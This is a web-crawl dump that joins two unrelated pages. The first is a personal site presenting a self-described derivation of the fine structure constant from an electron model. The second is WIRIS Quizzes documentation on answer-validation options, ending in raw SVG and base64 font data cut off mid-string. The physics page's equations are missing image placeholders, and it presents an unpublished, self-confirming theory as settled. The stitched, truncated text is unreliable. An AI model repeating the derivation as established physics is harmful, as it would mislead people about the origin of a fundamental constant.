{"ft_lang_label":"__label__en","ft_lang_prob":0.75336313,"math_prob":0.99102324,"size":1852,"snap":"2019-13-2019-22","text_gpt3_token_len":470,"char_repetition_ratio":0.121753246,"word_repetition_ratio":0.013157895,"special_character_ratio":0.2537797,"punctuation_ratio":0.13461539,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995678,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-26T09:30:17Z\",\"WARC-Record-ID\":\"<urn:uuid:090f3f53-ebca-40dc-a8b9-75c5d1263b67>\",\"Content-Length\":\"88349\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b30d20c7-4736-4060-89d2-eb61dbff316c>\",\"WARC-Concurrent-To\":\"<urn:uuid:2e24af22-3cf1-41e7-adeb-0957f4d14beb>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://mc-stan.org/docs/2_18/stan-users-guide/functions-acting-as-random-number-generators.html\",\"WARC-Payload-Digest\":\"sha1:TEID2IQJJK2VEBDMYHRSFDO57M7KPRQU\",\"WARC-Block-Digest\":\"sha1:46HA5ORBAEXJ4YGYSU4XTKVOZTVBXMGH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912204885.27_warc_CC-MAIN-20190326075019-20190326101019-00051.warc.gz\"}"}
http://www.ccaesar.com/eng_fine_structure_constant.html
[ "GER  |  ENG\nHOME", null, "STRUCTURE OF THE ELECTRON", null, "QUARK THEORY", null, "GRAVITY", null, "ARTICLES", null, "IMPRESSUM", null, "# Fine Structure Constant\n\nThe fine structure - or coupling - constant is one of the biggest mysteries of physics of the last decades.\n\nThe current descriptions and explanations (according to the Wikipedia page on the subject and various findings and interpretations) are strictly empirical. There are at least seven possible physical interpretations on this wikipedia page for the physical meaning of the fine structure constant.\n\nThe approach of the circulating electromagnetic wave model of the electron on this website (submitted for publication) derives the simple formula for the fine structure constant with a clear physical concept.\n\nThe ratio of the field energy responsible for the charge to the total particle rest energy is the dimensionless figure 1/137, which is identical in value and formula to the fine structure or coupling constant.\n\nThe fraction 1/X of the field energy of the electron that forms the external charge to the total field energy", null, "can be calculated. The electron is regarded as sphere capacitor with the stored energy E = 1/2 Q2 /C.", null, ". With the capacity", null, ", the charge Q is", null, "With the values for the de Broglie frequency", null, ", the electron radius", null, "determined above and the factor 1/X = 1/137, the electron charge is calculated correctly to 1.603 10-19 C. The dimensionless fraction 1/X equals the fine structure constant", null, ".\n\nIf the known formula of", null, "is inserted into the above equation, the product inside the root equals to", null, "and Q = e. The coupling constant", null, "perfectly confirms the current model.\n\nAbove approach is regarded the quantum realistic origin and meaning of the coupling - or fine structure constant as the ratio of the electric field energy forming the charge of the electron to the total field energy", null, ".\nThe most recent elaborated papers submitted for publication see this page on the right side on the electron or on the quark.\n\nThis physical approach for the origin of the fine structure constant is simple and gives a definition that does not rely on the interaction between a photon and the electron.\n\nFrom the spin the electric charge and the electron radius can be calculated.\n\nsee the page on the Structure of the Electron.\n\nor see the page on the Structure of Nucleons and Quarks.\n\n Structure of the Electron - Correlation of Elementary Charge with Spin in a Singularity Free Electron Model read more This work on the structure of the electron has been submitted to scientific journals in serveral versions.\n Structure of the Quark, Structure of Nucleons and Quarks - Correlation of Proton Mass with Electron Mass read more The work on the composition of the nucleons and quarks has been submitted to a scientific journal, too. Find here the latest version of the submitted paper on the nucleon and quark substructure.", null, "Web Counter by www.webcounter.goweb.de" ]
[ null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/mm_sep_line.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image037.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image039.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image041.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image043.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image045.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image047.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image049.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image051.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image053.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image049.gif", null, "http://www.ccaesar.com/images/eng_structure_of_the_electron/clip_image056.gif", null, "http://webcounter.goweb.de/16876.GIF", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8277554,"math_prob":0.9707032,"size":2226,"snap":"2020-10-2020-16","text_gpt3_token_len":474,"char_repetition_ratio":0.16651665,"word_repetition_ratio":0.021621622,"special_character_ratio":0.19631626,"punctuation_ratio":0.060606062,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9550289,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,5,null,3,null,3,null,3,null,3,null,3,null,6,null,3,null,3,null,6,null,3,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-04-04T01:42:23Z\",\"WARC-Record-ID\":\"<urn:uuid:30cee7ab-566c-4322-ab17-90d4cf0e9b4b>\",\"Content-Length\":\"15340\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:be78a843-a1ce-407c-bc41-66b7b374624b>\",\"WARC-Concurrent-To\":\"<urn:uuid:975cc544-3770-44aa-945d-3498954f8f80>\",\"WARC-IP-Address\":\"80.150.6.143\",\"WARC-Target-URI\":\"http://www.ccaesar.com/eng_fine_structure_constant.html\",\"WARC-Payload-Digest\":\"sha1:47454EJ2IQM2BNLOQY3IQYUEIEPNWOWC\",\"WARC-Block-Digest\":\"sha1:USCAUOOI56WJKAMQQGGAU5MJWBKNGGHX\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-16/CC-MAIN-2020-16_segments_1585370519111.47_warc_CC-MAIN-20200404011558-20200404041558-00217.warc.gz\"}"}
https://docs.wiris.com/en/quizzes/user_interface/validation/validation
[ "Here you select what kind of input is expected from the student. For example, choose between general mathematical expressions or quantities that involve units. Along with this, you can decide how the correct answer is validated against the student answer. The main function of many of the options is to decide how syntax checking works on the student side. For example [0,1) is normally highlighted as incorrect syntax, unless we choose the Intervals option. The tab is divided into three sections, explained below.\n\nAllowed input\n\nChoose the desired answer type. These can be:\n\n• General: Any mathematical expression. This is the default option, and it is probably the type you need in the majority of cases.\n• Quantity: The most important use of this is for answers with units or currencies. This option would also be appropriate for numerical answers, fractions, ratios, etc. The General option will work for these cases, but you have a few more options with Quantity.\n• Text: For pure text answers with no mathematical content. This option is rarely used. More details here.\n\nThe first two also have a series of options.\n\nOptions for General\n\nOption Description Default\nConstants Which symbols are recognized as mathematical constants (e.g. if i is enabled then i² will be understood as –1). All selected\nFunctions Which function names are recognized by their usual meaning. (e.g. if exp/log is enabled then \"ln(2)\" will be understood and calculated as 0.6931... All selected\nUser Functions Define your own function names to add to the above list. They won't be calculated as anything, but sometimes this option is useful. See this page for an example: user functions Empty\nList Allow lists as answers. Options for list separators are shown below. Selected\nLists always need curly brackets \"{}\" Require that lists be enclosed in curly brackets to be recognized as a list (e.g. if selected \"4,7,88,9\" would not be understood as a list - in fact it would be highlighted as syntactically incorrect). Selected\nIntervals Recognizes interval notation as valid syntax. Expressions like [0,1] are already valid without this, but now we may have for instance ]0,1] or (0,1]. More details here. Unselected\nSeparators Decide which symbols act as decimal, digit, and list separators. Point \".\" : decimal digits\nComma \",\" : list items\nSpace \" \" : Nothing\n\nOptions for Quantity\n\nOption Description Default\nConstants Which symbols are recognized as mathematical constants (e.g. if i is enabled then i² will be understood as –1). π, i, j\nUnits Which units are recognized. It's important to note that \"all\" includes more units than the other 6 shown - it includes all S.I. basic and derived units. all\nUnit prefixes Which unit prefixes are recognized. Again, \"all\" includes more prefixes than the ones shown. M,k,c,m\nMixed fractions Allow mixed fractions to be recognized. Without this option, a number next to a fraction is understood to be multiplying it. Unselected\nList Allow lists as answers. Selected\nSeparators Decide which symbols act as a decimal, digit, and list separators. Additionally, you can use apostrophe ' for decimal mark. You must choose Quantity, and in Options > Units uncheck all, and then uncheck º'\". 
Point \".\" : decimal digits\nComma \",\" : list items\nSpace \" \" : Nothing\nSee a detailed explanation of lists and sets here.\nSee a detailed explanation of percentages and per mille use here.\n\nComparison with student answer\n\nOnce we've decided what format we expect the student answer to be in, we have a few options for how their answer should be compared to the correct answer.\n\nComparison with student answer criteria\nTolerance This specifies the tolerance criteria used for the comparison between the student's answer and the correct answer. This setting applies globally (to the entire question). The default value is 0.1% percent error. More details\nLiterally equal This removes all mathematical interpretation from the comparison. The student's answer is only correct if it matches the correct answer exactly. For example, if the correct answer is 4 but the student writes 4.0, it will not be counted. This criterion is rarely recommended.\nMathematically equal This is the default comparison. It will detect if what the student has written is mathematically equal to the correct answer. For example, we don't need to worry if the student writes a + b or b + a. More details\nEquivalent equations This comparison is very similar to the above, but it is for the special case where the answer is an equation (e.g. the student could write y = 2x – 5, or , or any equivalent form). More details\nAny answer Anything that the student answers will be counted as correct. This is useful in some cases. More details\nGrading function Define your own function to decide which answers are accepted, and how to grade them. This is an advanced feature. More details\nCompare as sets This is a checkbox that is independent of the above options. When checked, order and repetition are ignored from lists. So, if the correct answer is the set {1,5,2}, then {5,5,5,2,1} (for example) would be accepted. More details\n\nSometimes it's not just the value of the answer that's important, but also its form. This usually happens when you are teaching basic algebraic manipulation, and you want the answer in a very specific form. For example, if you’re teaching how to reduce a fraction, you probably want to accept only the reduced fraction as the correct answer. If so, all other equivalent fractions are wrong, despite having the same value. In this case, we need to select is simplified from the list of Additional properties.\n\nStructure Examples\nCorrect Wrong\nhas integer form It checks whether the answer is a single integer", null, "has fraction form It checks whether the answer is a single fraction or integer", null, "has polynomial form It checks whether the answer is syntactically a polynomial with real or complex coefficients", null, "has rational function form It checks whether the answer has the form of a rational function", null, "is a combination of elementary functions It checks whether the answer is a combination of elemental functions", null, "is expressed in scientific notation It checks whether the answer is in scientific notation", null, "Specific property Examples\nCorrect Wrong\nis simplified It checks whether the expression cannot be simplified", null, "is expanded It checks whether the expression is in its fully expanded form", null, "is factorized It checks whether an integer or a polynomial is factorized", null, "is rationalized It checks whether the expression does not have square (or higher) roots in the denominator. 
It also checks whether the expression has a pure real denominator (in the case of complex numbers)", null, "doesn't have common factors It checks whether the summands of the answer have no common factors", null, "has minimal radicands It checks whether any present radicands are minimal", null, "is divisible by It checks whether the answer is divisible by the given value", null, ", given", null, "", null, ", given\nhas a single common denominator It checks whether the answer has a single common denominator", null, "has unit equivalent to It checks whether the unit of measurement in the student's answer is equivalent to the given one. Multiples are not equivalent", null, ", given", null, "", null, ", given\nhas unit literally equal to It checks whether the unit of the answer is literally equal to the given one", null, ", given", null, "", null, ", given\nhas precision It check that the response is expressed within a given precision range", null, ", between 3 and 4 significant figures , between 3 and 4 decimal places\n\nFor a complete and advanced description of all the properties, see assertions." ]
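As a rough illustration of the default tolerance comparison described above (a plain-Python sketch, not the actual WIRIS grading engine; the 0.1% figure is the default mentioned in the Tolerance row):

def within_tolerance(student, correct, rel_tol=0.001):
    # Accept the student's value if its relative error with respect to the correct
    # answer is at most rel_tol (0.1% by default); fall back to absolute error at zero.
    if correct == 0:
        return abs(student) <= rel_tol
    return abs(student - correct) / abs(correct) <= rel_tol

print(within_tolerance(3.1416, 3.14159265))   # True  (relative error ~2e-6)
print(within_tolerance(3.15, 3.14159265))     # False (relative error ~0.27%)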
[ null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2219%22%20width%3D%2228%22%20wrs%3Abaseline%3D%2215%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E123%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2213.5%22%20y%3D%2215%22%3E123%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2241%22%20width%3D%2231%22%20wrs%3Abaseline%3D%2226%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmfrac%3E%3Cmn%3E1%3C%2Fmn%3E%3Cmn%3E2%3C%2Fmn%3E%3C%2Fmfrac%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1da40657c9fece7e48d30af42d3'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAcmhlYWQQC2qxAAACAAAAADZoaGVhCGsXSAAAAjgAAAAkaG10eE2rRkcAAAJcAAAACGxvY2EAHTwYAAACZAAAAAxtYXhwBT0FPgAAAnAAAAAgbmFtZaBxlY4AAAKQAAABn3Bvc3QB9wD6AAAEMAAAACBwcmVwa1uragAABFAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAIhL%2F%2FwAAIhL%2F%2F93vAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAByAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22math1da40657c9fece7e48d30af42d3%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%226.5%22%20y%3D%2226%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%2215.5%22%20x2%3D%2227.5%22%20y1%3D%2220.5%22%20y2%3D%2220.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2221.5%22%20y%3D%2215%22%3E1%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2221.5%22%20y%3D%2237%22%3E2%3C%2Ftext%3E%3C%2Fsvg%3E", null, 
"data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2220%22%20width%3D%2234%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E1%3C%2Fmn%3E%3Cmo%3E-%3C%2Fmo%3E%3Cmi%3Ex%3C%2Fmi%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1da40657c9fece7e48d30af42d3'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAcmhlYWQQC2qxAAACAAAAADZoaGVhCGsXSAAAAjgAAAAkaG10eE2rRkcAAAJcAAAACGxvY2EAHTwYAAACZAAAAAxtYXhwBT0FPgAAAnAAAAAgbmFtZaBxlY4AAAKQAAABn3Bvc3QB9wD6AAAEMAAAACBwcmVwa1uragAABFAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAIhL%2F%2FwAAIhL%2F%2F93vAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIABVQLVAasAAwAwGAGwBBCxAAP2sAM8sQIH9bABPLEFA%2BYAsQAAExCxAAblsQABExCwATyxAwX1sAI8EyEVIYACVf2rAatWAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAByAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3E1%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1da40657c9fece7e48d30af42d3%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2216.5%22%20y%3D%2216%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%2228.5%22%20y%3D%2216%22%3Ex%3C%2Ftext%3E%3C%2Fsvg%3E", null, 
"data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2241%22%20width%3D%2218%22%20wrs%3Abaseline%3D%2226%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmfrac%3E%3Cmi%3Ey%3C%2Fmi%3E%3Cmi%3Ex%3C%2Fmi%3E%3C%2Fmfrac%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%2F%3E%3C%2Fdefs%3E%3Cline%20stroke%3D%22%23000000%22%20stroke-linecap%3D%22square%22%20stroke-width%3D%221%22%20x1%3D%222.5%22%20x2%3D%2214.5%22%20y1%3D%2220.5%22%20y2%3D%2220.5%22%2F%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%228.5%22%20y%3D%2215%22%3Ey%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20font-style%3D%22italic%22%20text-anchor%3D%22middle%22%20x%3D%228.5%22%20y%3D%2237%22%3Ex%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2224%22%20width%3D%2280%22%20wrs%3Abaseline%3D%2219%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmi%3Esin%3C%2Fmi%3E%3Cmo%3E(%3C%2Fmo%3E%3Cmi%3Ex%3C%2Fmi%3E%3Cmo%3E)%3C%2Fmo%3E%3Cmo%3E%2B%3C%2Fmo%3E%3Cmsqrt%3E%3Cmi%3Ey%3C%2Fmi%3E%3C%2Fmsqrt%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math117e62166fc8586dfa4d1bc0e17'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAoWhlYWQQC2qxAAACMAAAADZoaGVhCGsXSAAAAmgAAAAkaG10eE2rRkcAAAKMAAAACGxvY2EAHTwYAAAClAAAAAxtYXhwBT0FPgAAAqAAAAAgbmFtZaBxlY4AAALAAAABn3Bvc3QB9wD6AAAEYAAAACBwcmVwa1uragAABIAAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAACv%2F%2FwAAACv%2F%2F%2F%2FWAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABAIAAVQLVAqsACwBJARiyDAEBFBMQsQAD9rEBBPWwCjyxAwX1sAg8sQUE9bAGPLENA%2BYAsQAAExCxAQbksQEBExCwBTyxAwTlsQsF9bAHPLEJBOUxMBMhETMRIRUhESMRIYABAFUBAP8AVf8AAasBAP8AVv8AAQAAAAAAAQAAAAEAANV4zkFfDzz1AAMEAP%2F%2F%2F%2F%2FWOhNz%2F%2F%2F%2F%2F9Y6E3MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAgNSAFUDVgCAAAAAAAAAACgAAAChAAEAAAACAF4ABQAAAAAAAgCABAAAAAAABAAA3gAAAAAAAAAVAQIAAAAAAAAAAQASAAAAAAAAAAAAAgAOABIAAAAAAAAAAwAwACAAAAAAAAAABAASAFAAAAAAAAAABQAWAGIAAAAAAAAABgAJAHgAAAAAAAAACAAcAIEAAQAAAAAAAQASAAAAAQAAAAAAAgAOABIAAQAAAAAAAwAwACAAAQAAAAAABAASAFAAAQAAAAAABQAWAGIAAQAAAAAABgAJAHgAAQAAAAAACAAcAIEAAwABBAkAAQASAAAAAwABBAkAAgAOABIAAwABBAkAAwAwACAAAwABBAkABAASAFAAAwABBAkABQAWAGIAAwABBAkABgAJAHgAAwABBAkACAAcAIEATQBhAHQAaAAgAEYAbwBuAHQAUgBlAGcAdQBsAGEAcgBNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAIABNAGEAdABoACAARgBvAG4AdABNAGEAdABoACAARgBvAG4AdABWAGUAcgBzAGkAbwBuACAAMQAuADBNYXRoX0ZvbnQATQBhAHQAaABzACAARgBvAHIAIABNAG8AcgBlAAADAAAAAAAAAfQA%2BgAAAAAAAAAAAAAAAAAAAAAAAAAAuQcRAACNhRgAsgAAABUUE7EAAT8%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%40font-face%7Bfont-family%3A'round_brackets18549f92a457f2409'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMjwHLFQAAADMAAAATmNtYXDf7xCrAAABHAAAADxjdnQgBAkDLgAAAVgAAAASZ2x5ZmAOz2cAAAFsAAABJG
hlYWQOKih8AAACkAAAADZoaGVhCvgVwgAAAsgAAAAkaG10eCA6AAIAAALsAAAADGxvY2EAAARLAAAC%2BAAAABBtYXhwBIgEWQAAAwgAAAAgbmFtZXHR30MAAAMoAAACOXBvc3QDogHPAAAFZAAAACBwcmVwupWEAAAABYQAAAAHAAAGcgGQAAUAAAgACAAAAAAACAAIAAAAAAAAAQIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAo8AMGe%2F57AAAHPgGyAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACgAAAAGAAQAAQACACgAKf%2F%2FAAAAKAAp%2F%2F%2F%2F2f%2FZAAEAAAAAAAAAAAFUAFYBAAAsAKgDgAAyAAcAAAACAAAAKgDVA1UAAwAHAAA1MxEjEyMRM9XVq4CAKgMr%2FQAC1QABAAD%2B0AIgBtAACQBNGAGwChCwA9SwAxCwAtSwChCwBdSwBRCwANSwAxCwBzywAhCwCDwAsAoQsAPUsAMQsAfUsAoQsAXUsAoQsADUsAMQsAI8sAcQsAg8MTAREAEzABEQASMAAZCQ%2FnABkJD%2BcALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAA%2FtACIAbQAAkATRgBsAoQsAPUsAMQsALUsAoQsAXUsAUQsADUsAMQsAc8sAIQsAg8ALAKELAD1LADELAH1LAKELAF1LAKELAA1LADELACPLAHELAIPDEwARABIwAREAEzAAIg%2FnCQAZD%2BcJABkALQ%2FZD%2BcAGQAnACcAGQ%2FnAAAQAAAAEAAPW2NYFfD